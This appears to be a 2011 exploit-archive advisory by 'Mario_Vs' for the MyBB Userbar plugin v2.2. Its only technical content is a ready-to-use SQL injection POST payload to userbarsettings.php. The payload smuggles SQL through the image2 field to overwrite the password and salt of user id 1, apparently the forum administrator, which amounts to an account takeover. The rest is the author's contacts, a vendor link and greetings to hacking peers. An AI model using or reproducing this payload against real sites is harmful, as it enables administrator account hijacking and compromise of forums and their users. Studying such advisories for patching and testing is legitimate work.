28 lines
No EOL
962 B
Text
28 lines
No EOL
962 B
Text
---------------------------------------------------------------------
|
|
Exploit Title : MyBB Forum Userbar Plugin (Userbar v2.2)
|
|
---------------------------------------------------------------------
|
|
|
|
Author : Mario_Vs
|
|
Date : 10/10/2011
|
|
Site : http://mariovs.pl/
|
|
@ : mario_vs[at]o2.pl
|
|
---------------------------------------------------------------------
|
|
|
|
Description >
|
|
|
|
Vendor : http://mods.mybb.com/download/userbar-plugin
|
|
Tested On : Windows 7
|
|
---------------------------------------------------------------------
|
|
|
|
SQL Injection
|
|
|
|
>> userbarsettings.php
|
|
|
|
POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit
|
|
---------------------------------------------------------------------
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
|
|
|
|
All users: HackinQ.pl |